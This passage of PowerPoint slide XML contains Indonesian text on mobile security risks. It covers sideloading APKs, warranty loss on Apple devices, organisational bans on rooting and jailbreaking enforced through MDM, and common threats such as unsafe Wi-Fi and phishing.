            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengunduhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikompromikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Sideload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Android yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file APK (Android Application Package). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Apple, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melanggar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>syarat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketentuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Apple dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>garansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membatalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>garansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bug, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perawatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rooting, sideload, dan jailbreak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (MDM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rooting, jailbreaking, dan sideloading. Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>edukasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rutin juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>portabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
